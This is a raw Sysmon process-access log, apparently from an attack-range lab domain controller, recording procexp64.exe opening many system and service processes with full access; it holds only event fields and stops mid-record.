15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792222Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792221Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792220Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792219Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792218Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792217Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792216Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792215Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792214Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792213Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792212Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792211Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792210Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792209Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792208Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792207Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792206Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792205Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792204Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792203Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792202Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792201Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792200Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792199Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792198Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792197Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792196Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792195Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792194Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792193Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792192Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792191Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792190Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792189Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792188Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792187Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792186Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:00.829{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program 